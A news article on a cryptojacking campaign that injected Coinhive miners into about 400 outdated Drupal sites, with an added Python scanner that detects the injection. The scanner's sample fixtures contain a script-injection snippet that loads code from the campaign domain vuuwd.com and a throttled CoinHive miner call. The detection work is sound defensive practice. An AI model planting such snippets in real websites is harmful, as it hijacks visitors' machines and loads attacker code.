
Cryptojacking campaign hits 400 Drupal-based sites, many run by governments and universities

Nearly 400 websites running outdated and vulnerable versions of the Drupal content management system, many affiliated with governments and educational institutions, were recently discovered to be infected with Coinhive-based cryptomining software.

In a May 5 post on his "Bad Packets Report" blog site, security researcher Troy Mursch says that the Monero cryptojacking campaign he uncovered compromised 391 sites in total, more than a quarter of which are U.S.-based. Prominent victims included the San Diego Zoo, Lenovo, DLink (Brazil), UCLA, the National Labor Relations Board, the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC), and the government of Chihuahua, Mexico.

Mursch explains that the sites all had Coinhive or a throttled implementation of Coinhive injected into a JavaScript library. All of the sites had a Coinhive site key that pointed to the domain vuuwd.com, which was registered with fraudulent WHOIS information and has been used in previous Monero mining operations.

The researcher notes that the attacker was sloppy in that he used a self-signed SSL certificate instead of a trusted one, meaning the payload is not injected using HTTPS. Consequently, in at least some cases, Coinhive failed to load on the sites because the connection to the server was blocked.
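Site operators checking their own web root for the injection described above can scan served JavaScript for the Coinhive client constructor and for references to the campaign domain. The following is an added example, not code from Mursch's report: the file names, site key and loader path in the sample are constructed, and `CoinHive.Anonymous` / `CoinHive.User` are the constructor names of the Coinhive client library.

```python
import re

CAMPAIGN_DOMAIN = "vuuwd.com"  # domain named in the article
# Coinhive client constructor, capturing site key and optional throttle.
MINER_CTOR = re.compile(
    r"new\s+CoinHive\.(Anonymous|User)\s*\(\s*['\"]([A-Za-z0-9]+)['\"]"
    r"(?:[^)]*?throttle\s*:\s*([0-9]*\.?[0-9]+))?", re.S)
# Absolute or protocol-relative URL whose host is the domain or a subdomain.
DOMAIN_REF = re.compile(
    r"//((?:[A-Za-z0-9-]+\.)*" + re.escape(CAMPAIGN_DOMAIN)
    + r")(?=[/:'\"?\s]|$)", re.I)

def line_of(text, pos):
    """1-based line number of character offset pos."""
    return text.count("\n", 0, pos) + 1

def scan_js(path, text):
    """Return findings (dicts) for one JavaScript file's contents."""
    findings = []
    for m in MINER_CTOR.finditer(text):
        findings.append({"file": path, "type": "coinhive_miner",
                         "api": m.group(1), "site_key": m.group(2),
                         "throttle": float(m.group(3)) if m.group(3) else None,
                         "line": line_of(text, m.start())})
    for m in DOMAIN_REF.finditer(text):
        findings.append({"file": path, "type": "campaign_domain",
                         "host": m.group(1).lower(),
                         "line": line_of(text, m.start())})
    return findings

def scan_all(files):
    """files maps path -> contents; returns all findings."""
    return [f for path, text in files.items() for f in scan_js(path, text)]

# Constructed sample files (not taken from any real site).
SAMPLES = {
    "misc/example-lib.js": "(function ($) {\n"
        "  $.fn.example = function () { return this; };\n"
        "})(jQuery);\n"
        "var s = document.createElement('script');\n"
        "s.src = 'http://vuuwd.com/loader.js';\n"
        "document.head.appendChild(s);\n",
    "misc/throttled.js": "var miner = new CoinHive.Anonymous("
        "'CONSTRUCTEDSITEKEY000', {throttle: 0.3});\nminer.start();\n",
    "misc/clean.js": "console.log('ok');\n",
}

if __name__ == "__main__":
    for finding in scan_all(SAMPLES):
        print(finding)
```

A hit in a file that ships with Drupal core or a contributed module is best confirmed by comparing that file against a clean copy of the same release.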

Drupal-based websites have emerged as an alluring target for cryptomining campaigns of late, following the discovery of the Drupalgeddon 2.0 vulnerability that was patched last March. It is not clear if the attackers in this case exploited this particular bug, however.

"We've seen plenty examples of Drupalgeddon 2 being exploited in the past few weeks," Mursch writes. "This is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale."

Bradley Barth

